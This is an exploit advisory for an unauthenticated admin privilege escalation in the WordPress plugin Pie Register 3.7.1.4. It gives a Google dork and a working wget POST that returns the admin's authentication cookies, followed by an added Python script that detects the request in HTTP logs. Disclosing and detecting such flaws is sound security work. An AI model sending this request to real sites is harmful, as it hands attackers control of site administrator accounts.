WordPress Pie Register 3.7.1.4 Privilege Escalation

2021.10.11
Credit: Lotfi13-DZ
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu

Vulnerable arg: [user_id_social_site=1] <== will return the authentication cookies for user 1 (admin).

Exploit:

wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
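
Detection sketch for the request above, added here as an example and not part of the original advisory or the plugin: it scans logged HTTP exchanges for POST bodies carrying user_id_social_site and separates plain attempts from those answered with a WordPress login cookie. The record layout (src, method, path, body, set_cookies) and the sample entries are constructed assumptions.

```python
from urllib.parse import parse_qs

AUTH_COOKIE_PREFIX = "wordpress_logged_in_"  # WordPress login cookie name prefix

# Constructed sample exchanges (assumed format: one dict per request/response pair).
SAMPLE_LOG = [
    {"src": "198.51.100.7", "method": "POST", "path": "/",
     "body": "user_id_social_site=1&social_site=true"
             "&piereg_login_after_registration=true"
             "&_wp_http_referer=/login/&log=null&pwd=null",
     "set_cookies": ["wordpress_logged_in_0123abcd=admin%7Cx; path=/; HttpOnly"]},
    {"src": "198.51.100.7", "method": "POST", "path": "/",
     "body": "user_id_social_site=2&social_site=true",
     "set_cookies": []},
    {"src": "203.0.113.20", "method": "POST", "path": "/wp-login.php",
     "body": "log=alice&pwd=correct-horse",
     "set_cookies": ["wordpress_logged_in_0123abcd=alice%7Cx; path=/; HttpOnly"]},
]


def classify(entry):
    """Return (verdict, target_user_id) for one logged exchange."""
    if entry["method"].upper() != "POST":
        return ("ok", None)
    # keep_blank_values: an empty user_id_social_site= still counts as present
    params = parse_qs(entry["body"], keep_blank_values=True)
    if "user_id_social_site" not in params:
        return ("ok", None)
    target = params["user_id_social_site"][0]
    # A login cookie in the response means the request was granted a session.
    got_session = any(c.lstrip().startswith(AUTH_COOKIE_PREFIX)
                      for c in entry["set_cookies"])
    return ("session-issued" if got_session else "attempt", target)


def scan(log):
    """Return one finding per exchange that is not classified 'ok'."""
    findings = []
    for entry in log:
        verdict, target = classify(entry)
        if verdict != "ok":
            findings.append({"src": entry["src"], "verdict": verdict,
                             "user_id": target})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

This needs a log source that records POST bodies and response Set-Cookie headers, such as a WAF or reverse-proxy audit log; a standard access log does not contain either.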



Copyright 2021, cxsecurity.com

 
